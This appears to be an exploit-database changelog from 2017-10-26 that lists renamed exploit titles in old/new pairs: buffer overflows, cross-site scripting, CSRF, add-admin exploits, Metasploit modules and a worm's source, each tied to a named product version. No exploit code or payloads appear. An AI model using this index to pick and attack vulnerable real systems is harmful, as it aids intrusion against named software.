DB: 2017-10-26

11 new exploits

Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow (PoC)
Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow (PoC)

AT-TFTP 1.9 - 'Long Filename' Remote Buffer Overflow (PoC)
AT-TFTP 1.9 - 'Filename' Remote Buffer Overflow (PoC)

VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (PoC)

ByteCatcher FTP Client 1.0.4 - Long Server Banner Buffer Overflow
ByteCatcher FTP Client 1.0.4 - 'Server Banner' Buffer Overflow

Avant Browser 8.0.2 - Long HTTP Request Buffer Overflow
Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow

thttpd 2.2x - defang Remote Buffer Overflow (PoC)
thttpd 2.2x - 'defang' Remote Buffer Overflow (PoC)

Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow
Rigs of Rods 0.33d - 'Vehicle Name' Buffer Overflow
Wireshark infer_pkt_encap - Heap Based Out-of-Bounds Read
Wireshark AirPDcapDecryptWPABroadcastKey - Heap Based Out-of-Bounds Read
Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read
Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1)

Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read
Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2)

Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4- PacketBB Dissector Denial of Service
Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - PacketBB Dissector Denial of Service

WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization
WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (1)

glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploits
glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploit
WinRAR 3.30 - Long Filename Buffer Overflow (1)
WinRAR 3.30 - Long Filename Buffer Overflow (2)
WinRAR 3.30 - 'Filename' Buffer Overflow (1)
WinRAR 3.30 - 'Filename' Buffer Overflow (2)

Pico Zip 4.01 - Long Filename Buffer Overflow
Pico Zip 4.01 - 'Filename' Buffer Overflow

PowerZip 7.06.38950 - Long Filename Handling Buffer Overflow
PowerZip 7.06.38950 - 'Filename Handling' Buffer Overflow

Oracle 9i/10g - Evil Views Change Passwords Exploit
Oracle 9i/10g - Evil Views Change Passwords
Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)
Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2)
Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)
Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)
VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (2)
VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (1)
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (2)
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (1)

Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1)
Wireshark 1.4.4 - 'packet-dect.c' Stack Buffer Overflow (Metasploit) (1)
SGI IRIX 6.2 - eject Exploit (1)
SGI IRIX 6.2 - eject Exploit (2)
SGI IRIX 6.2 - 'eject' Exploit (1)
SGI IRIX 6.2 - 'eject' Exploit (2)

Slackware Linux 3.1/3.2 - color_xterm Buffer Overflow (2)
Slackware Linux 3.1/3.2 - 'color_xterm' Buffer Overflow (2)

RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - Exploit (2)
RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' Exploit (2)
RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - klogd Buffer Overflow (1)
RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - klogd Buffer Overflow (2)
RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Buffer Overflow (1)
RedHat Linux 5.0/5.1/5.2 / Slackware Linux 3.5 - 'klogd' Buffer Overflow (2)
Solaris 2.5.1 kcms - Buffer Overflow (1)
Solaris 2.5.1 kcms - Buffer Overflow (2)
Solaris 2.5.1 - 'kcms' Buffer Overflow (1)
Solaris 2.5.1 - 'kcms' Buffer Overflow (2)

SGI IRIX 6.3 Systour and OutOfBox - Exploits
SGI IRIX 6.3 Systour and OutOfBox - Exploit

RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (1)
RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (1)

GNU glibc 2.1/2.1.1 -6 - pt_chown Exploit
GNU glibc 2.1/2.1.1 -6 - 'pt_chown' Exploit
Solaris 7.0 ufsdump - Local Buffer Overflow (1)
Solaris 7.0 ufsdump - Local Buffer Overflow (2)
Solaris 7.0 - 'ufsdump' Local Buffer Overflow (1)
Solaris 7.0 - 'ufsdump' Local Buffer Overflow (2)

SCO Unixware 7.0 - xlock(1) (long 'Username') Buffer Overflow
SCO Unixware 7.0 - 'xlock(1)' 'Username' Buffer Overflow
RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (1)
RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (2)
RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (1)
RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (2)
Solaris 2.6/7.0 - lpset -r Buffer Overflow (1)
Solaris 2.6/7.0 - lpset -r Buffer Overflow (2)
Solaris 2.6/7.0 - lpset -r Buffer Overflow (3)
Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (1)
Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (2)
Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (3)
Solaris 2.6/7.0/8 netpr - Buffer Overflow (1)
Solaris 2.6/7.0/8 netpr - Buffer Overflow (2)
Solaris 2.6/7.0/8 - 'netpr' Buffer Overflow (1)
Solaris 2.6/7.0/8 - 'netpr' Buffer Overflow (2)
S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (1)
S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (2)
S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - fdmount Buffer Overflow (3)
S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1)
S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2)
S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3)
Solaris 2.x/7.0/8 Catman - Race Condition (1)
Solaris 2.x/7.0/8 Catman - Race Condition (2)
Solaris 2.x/7.0/8 - 'Catman' Race Condition (1)
Solaris 2.x/7.0/8 - 'Catman' Race Condition (2)

DG/UX 4.20 lpsched - Long Error Message Buffer Overflow
DG/UX 4.20 lpsched - 'Error Message' Buffer Overflow
Solaris 7/8 kcms_configure - Command-Line Buffer Overflow (1)
Solaris 7/8 kcms_configure - Command-Line Buffer Overflow (2)
Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (1)
Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)
Solaris 2.5/2.6/7.0/8 - mailx -F Buffer Overflow (1)
Solaris 2.5/2.6/7.0/8 - mailx -F Buffer Overflow (2)
Solaris 2.5/2.6/7.0/8 - 'mailx -F' Buffer Overflow (1)
Solaris 2.5/2.6/7.0/8 - 'mailx -F' Buffer Overflow (2)

Sawmill 6.2.x - AdminPassword Insecure Default Permissions
Sawmill 6.2.x - Admin Password Insecure Default Permissions
XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)
XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (2)
XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (3)
XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (4)
XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (1)
XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (2)
XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (3)
XFree86 4.2 - 'XLOCALEDIR' Local Buffer Overflow (4)

BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct Retn)
BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct RETN)

Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation (1)

Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation (2)

Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Long Filename' Remote Buffer Overflow
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow

Microsoft Internet Explorer - XML Parsing Buffer Overflow
Microsoft Internet Explorer - XML Parsing Buffer Overflow (1)

Microsoft Internet Explorer - XML Parsing Buffer Overflow
Microsoft Internet Explorer - XML Parsing Buffer Overflow (2)

Orbit Downloader 2.8.4 - Long Hostname Remote Buffer Overflow
Orbit Downloader 2.8.4 - 'Hostname' Remote Buffer Overflow

Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities
Huawei SmartAX MT880 - Cross-Site Request Forgery Multiple Vulnerabilities

Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit)
Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (1) (Metasploit)

HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities
HP LaserJet Printers - Persistent Cross-Site Scripting Multiple Vulnerabilities

XFTP 3.0 Build 0239 - Long Filename Buffer Overflow
XFTP 3.0 Build 0239 - 'Filename' Buffer Overflow

Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit)
Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (2) (Metasploit)
D-Link TFTP 1.0 - Long Filename Buffer Overflow (Metasploit)
ProSysInfo TFTP server TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit)
3Com TFTP Service (3CTftpSvc) - Long Mode Buffer Overflow (Metasploit)
D-Link TFTP 1.0 - 'Filename' Buffer Overflow (Metasploit)
ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Buffer Overflow (Metasploit)
3Com TFTP Service (3CTftpSvc) - 'Mode' Buffer Overflow (Metasploit)

TFTPD32 < 2.21 - Long Filename Buffer Overflow (Metasploit)
TFTPD32 < 2.21 - 'Filename' Buffer Overflow (Metasploit)

Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (2)
Wireshark 1.4.4 - 'packet-dect.c' Stack Buffer Overflow (Metasploit) (2)
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (1)
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (2)
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Exploit (1)
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Exploit (2)

Trend Micro Interscan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (1)
Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Buffer Overflow (1)

Trend Micro Interscan VirusWall 3.2.3/3.3 - Long HELO Buffer Overflow (2)
Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Buffer Overflow (2)
Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (1)
Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (2)
Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (3)
Solaris 2.5/2.5.1/2.6/7.0 sadmind - Buffer Overflow (4)
Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Buffer Overflow (1)
Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Buffer Overflow (2)
Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Buffer Overflow (3)
Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Buffer Overflow (4)

Sun Java Web Server 1.1.3/2.0 Servlets - Exploits
Sun Java Web Server 1.1.3/2.0 Servlets - Exploit

Samba 1.9.19 - Long Password Buffer Overflow
Samba 1.9.19 - 'Password' Buffer Overflow

OReilly Software WebSite Professional 2.5.4 - Directory Disclosure
OReilly Software WebSite Professional 2.5.4 - Path Disclosure
PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (1)
PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (2)
PowerScripts PlusMail WebConsole 1.0 - Poor Authentication (3)
PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (1)
PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (2)
PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (3)
AOLServer 3 - Long Authentication String Buffer Overflow (1)
AOLServer 3 - Long Authentication String Buffer Overflow (2)
AOLServer 3 - 'Authentication String' Buffer Overflow (1)
AOLServer 3 - 'Authentication String' Buffer Overflow (2)

John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow
John Roy Pi3Web 2.0 For Windows - Buffer Overflow

Phusion WebServer 1.0 - Long URL Buffer Overflow
Phusion WebServer 1.0 - 'URL' Buffer Overflow

Essentia Web Server 2.1 - Long URL Buffer Overflow
Essentia Web Server 2.1 - 'URL' Buffer Overflow

Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities
Monkey HTTP Server 0.1/0.4/0.5 - Cross-Site Scripting Multiple Vulnerabilities

TFTPD32 2.50 - Long Filename Buffer Overflow
TFTPD32 2.50 - 'Filename' Buffer Overflow

Opera 6.0/7.0 - Long Filename Download Buffer Overrun
Opera 6.0/7.0 - 'Filename Download' Buffer Overrun

PGP4Pine 1.75.6/1.76 - Long Message Line Buffer Overflow
PGP4Pine 1.75.6/1.76 - 'Message Line' Buffer Overflow
Passlog Daemon 0.1 - SL_Parse Remote Buffer Overflow (1)
Passlog Daemon 0.1 - SL_Parse Remote Buffer Overflow (2)
Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (1)
Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (2)

Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun
Tellurian TftpdNT 1.8/2.0 - 'Filename' Buffer Overrun

Nokia Electronic Documentation 5.0 - Directory Disclosure
Nokia Electronic Documentation 5.0 - Path Disclosure

TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities
TCLHttpd 3.4.2 - Cross-Site Scripting Multiple Vulnerabilities

WebFS 1.x - Long Pathname Buffer Overrun
WebFS 1.x - 'Pathname' Buffer Overrun

Monit 1.4/2.x/3/4 - Long HTTP Request Buffer Overrun
Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun

Novell Netware Enterprise Web Server 5.1/6.0 - Multiple Cross-Site Scripting Vulnerabilities
Novell Netware Enterprise Web Server 5.1/6.0 - Cross-Site Scripting Multiple Vulnerabilities

Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities
Oracle Reports Server 10g 9.0.2 - Cross-Site Scripting Multiple Vulnerabilities

NETGEAR MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow
NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Buffer Overflow

Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities
Hilgraeve HyperAccess 8.4 - Remote Command Execution Multiple Vulnerabilities

TeamSpeak Server 2.0.23 (Multiple Scripts) - Multiple Cross-Site Scripting Vulnerabilities
TeamSpeak Server 2.0.23 (Multiple Scripts) - Cross-Site Scripting Multiple Vulnerabilities

RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities
RedHat Directory Server 7.1 - Cross-Site Scripting Multiple Vulnerabilities

Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Multiple Cross-Site Scripting Vulnerabilities
Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Cross-Site Scripting Multiple Vulnerabilities

RSA Authentication Agent for Web 5.3 - URI Redirection
RSA Authentication Agent for Web 5.3 - Open Redirection

Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' URI redirection
Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection

Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities
Novell QuickFinder Server - Cross-Site Scripting Multiple Vulnerabilities

Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Multiple Cross-Site Scripting Vulnerabilities
Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Cross-Site Scripting Multiple Vulnerabilities

XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities
XAMPP 1.6.x - Cross-Site Scripting Multiple Vulnerabilities

Zenoss 2.3.3 - Multiple Cross-Site Request Forgery Vulnerabilities
Zenoss 2.3.3 - Cross-Site Request Forgery Multiple Vulnerabilities

Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities
Huawei HG510 - Cross-Site Request Forgery Multiple Vulnerabilities

IBM Lotus Notes 6.5.6 - 'names.nsf' Open redirection
IBM Lotus Notes 6.5.6 - 'names.nsf' Open Redirection

HP System Management Homepage - 'RedirectUrl' URI Redirection
HP System Management Homepage - 'RedirectUrl' Open Redirection

Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities
Nagios XI - Cross-Site Request Forgery Multiple Vulnerabilities

DServe - Multiple Cross-Site Scripting Vulnerabilities
DServe - Cross-Site Scripting Multiple Vulnerabilities

Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities
Mozilla Firefox/Thunderbird/SeaMonkey - HTML Injection Multiple Vulnerabilities
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities
Microsoft Visual Studio Report Viewer 2005 Control - Cross-Site Scripting Multiple Vulnerabilities
SurgeFTP 23b6 - Cross-Site Scripting Multiple Vulnerabilities

Xavi 7968 ADSL Router - Multiple Cross-Site Request Forgery Vulnerabilities
Xavi 7968 ADSL Router - Cross-Site Request Forgery Multiple Vulnerabilities

Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities
Barracuda CudaTel Communication Server 2.0.029.1 - HTML Injection Multiple Vulnerabilities

Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities
Barracuda Email Security Service - HTML Injection Multiple Vulnerabilities

Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities
Websense Content Gateway - Cross-Site Scripting Multiple Vulnerabilities

FirePass 7.0 SSL VPN - 'refreshURL' URI Redirection
FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection

Fortinet FortiWeb (Multiple Appliances) - Multiple Cross-Site Scripting Vulnerabilities
Fortinet FortiWeb (Multiple Appliances) - Cross-Site Scripting Multiple Vulnerabilities

Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities
Apache OFBiz 10.4.x - Cross-Site Scripting Multiple Vulnerabilities

Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities
Dell SonicWALL Scrutinizer - HTML Injection Multiple Vulnerabilities

Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities
Foscam IP (Multiple Cameras) - Cross-Site Request Forgery Multiple Vulnerabilities

Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities
Sony CH / DH Series IP Cameras - Cross-Site Request Forgery Multiple Vulnerabilities

Apache Struts 2.2.3 - Multiple Open redirection Vulnerabilities
Apache Struts 2.2.3 - Multiple Open Redirections

Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities
Barracuda CudaTel - Cross-Site Scripting Multiple Vulnerabilities

Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)

ZeroBoard Worm - Source Code
ZeroBoard - Worm Source Code
Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (3) (Perl)
Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (2) (PHP)
Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (1) (HTML)
Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl)
Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)
Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)

Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities
Jupiter CMS 1.1.5 - Cross-Site Scripting Multiple Vulnerabilities

AuraCMS 2.x - '/user.php' Security Code Bypass / Add Administrator
AuraCMS 2.x - '/user.php' Security Code Bypass / Arbitrary Add Administrator

pPIM 1.0 - upload/change Password
pPIM 1.0 - Upload/Change Password

Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities
Observer 0.3.2.1 - Remote Command Execution Multiple Vulnerabilities

VideoScript 4.0.1.50 - Admin Change Password Exploit
VideoScript 4.0.1.50 - Change Admin Password

txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges

eLitius 1.0 - '/manage-admin.php' Add Admin/Change Password Exploit
eLitius 1.0 - '/manage-admin.php' Arbitrary Add Admin/Change Password Exploit

ShaadiClone 2.0 - 'addAdminmembercode.php' Add Admin
ShaadiClone 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin

ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin
ZeeCareers 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin

ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities
ecshop 2.6.2 - Remote Command Execution Multiple Vulnerabilities

Zen Cart 1.3.8 - SQL Execution Exploit
Zen Cart 1.3.8 - SQL Execution

ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)
ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)

Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities
Snitz Forums 2000 - Cross-Site Scripting Multiple Vulnerabilities

Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting Vulnerabilities
Hyperic HQ 3.2 < 4.2-beta1 - Cross-Site Scripting Multiple Vulnerabilities

McAfee Network Security Manager < 5.1.11.8.1 - Multiple Cross-Site Scripting Vulnerabilities
McAfee Network Security Manager < 5.1.11.8.1 - Cross-Site Scripting Multiple Vulnerabilities

IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting Vulnerabilities
IBM Rational RequisitePro 7.10 / ReqWebHelp - Cross-Site Scripting Multiple Vulnerabilities

Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities
Sun Solaris AnswerBook2 - Cross-Site Scripting Multiple Vulnerabilities

Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities
Chipmunk Board Script 1.x - Cross-Site Request Forgery Multiple Vulnerabilities

Ez Cart 1.0 - Multiple Cross-Site Request Forgery Vulnerabilities
Ez Cart 1.0 - Cross-Site Request Forgery Multiple Vulnerabilities
Basic PHP Events Lister 2 - Add Admin
Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery Vulnerabilities
Basic PHP Events Lister 2 - Arbitrary Add Admin
Jobscript4Web 3.5 - Cross-Site Request Forgery Multiple Vulnerabilities

Traidnt Gallery - Add Admin
Traidnt Gallery - Arbitrary Add Admin

X7CHAT 1.3.6b - Add Admin
X7CHAT 1.3.6b - Arbitrary Add Admin

Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Drupal 6.15 - Persistent Cross-Site Scripting Multiple Vulnerabilities

CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities
CiviCRM 3.1 < Beta 5 - Cross-Site Scripting Multiple Vulnerabilities

Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities
Croogo 1.2.1 - Cross-Site Request Forgery Multiple Vulnerabilities

cPanel - Multiple Cross-Site Request Forgery Vulnerabilities
cPanel - Cross-Site Request Forgery Multiple Vulnerabilities
ATutor 1.6.4 - Multiple Cross-Site Scripting Vulnerabilities
ANE CMD CRSF - Add Admin
ATutor 1.6.4 - Cross-Site Scripting Multiple Vulnerabilities
ANE CMD CRSF - Arbitrary Add Admin

Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities
Apache OFBiz - Cross-Site Scripting Multiple Vulnerabilities

eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities
eXtreme Message Board 1.9.11 - Cross-Site Request Forgery Multiple Vulnerabilities

Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities
Campsite CMS 3.4.0 - Cross-Site Request Forgery Multiple Vulnerabilities

Phreebooks 2.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Phreebooks 2.0 - Persistent Cross-Site Scripting Multiple Vulnerabilities

Orbis CMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities
Orbis CMS 1.0.2 - Cross-Site Request Forgery Multiple Vulnerabilities

ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities
ZenPhoto CMS 1.3 - Cross-Site Request Forgery Multiple Vulnerabilities

Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component JomSocial 1.6.288 - Cross-Site Scripting Multiple Vulnerabilities

Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)
Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (1)
Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities
TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities
TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities
Frog CMS 0.9.5 - Cross-Site Request Forgery Multiple Vulnerabilities
TomatoCart 1.0.1 - Cross-Site Request Forgery Multiple Vulnerabilities
TomatoCMS 2.0.5 - Cross-Site Request Forgery Multiple Vulnerabilities

TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities
TheHostingTool 1.2.2 - Cross-Site Request Forgery Multiple Vulnerabilities

Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities
Grafik CMS 1.1.2 - Cross-Site Request Forgery Multiple Vulnerabilities

Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities
Diferior CMS 8.03 - Cross-Site Request Forgery Multiple Vulnerabilities

MyIT CRM - Multiple Cross-Site Scripting Vulnerabilities
MyIT CRM - Cross-Site Scripting Multiple Vulnerabilities

Saurus CMS Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities
Saurus CMS Admin Panel - Cross-Site Request Forgery Multiple Vulnerabilities

Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities
Hycus CMS 1.0.1 - Cross-Site Request Forgery Multiple Vulnerabilities

sNews CMS - Multiple Cross-Site Scripting Vulnerabilities
sNews CMS - Cross-Site Scripting Multiple Vulnerabilities

BlogBird Platform - Multiple Cross-Site Scripting Vulnerabilities
BlogBird Platform - Cross-Site Scripting Multiple Vulnerabilities

Front Accounting 2.3RC2 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Front Accounting 2.3RC2 - Persistent Cross-Site Scripting Multiple Vulnerabilities

Diferior 8.03 - Multiple Cross-Site Scripting Vulnerabilities
Diferior 8.03 - Cross-Site Scripting Multiple Vulnerabilities

MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities
MySmartBB 1.7 - Cross-Site Scripting Multiple Vulnerabilities

Radius Manager 3.8.0 - Multiple Cross-Site Scripting Vulnerabilities
Radius Manager 3.8.0 - Cross-Site Scripting Multiple Vulnerabilities

PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities
PiXie CMS 1.04 - Cross-Site Request Forgery Multiple Vulnerabilities

Openfire 3.6.4 - Multiple Cross-Site Request Forgery Vulnerabilities
Openfire 3.6.4 - Cross-Site Request Forgery Multiple Vulnerabilities

TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities
TaskFreak! 0.6.4 - Cross-Site Scripting Multiple Vulnerabilities

SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities
SmarterMail 8.0 - Cross-Site Scripting Multiple Vulnerabilities

WikiWig 5.01 - Multiple Cross-Site Scripting Vulnerabilities
WikiWig 5.01 - Cross-Site Scripting Multiple Vulnerabilities

Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)
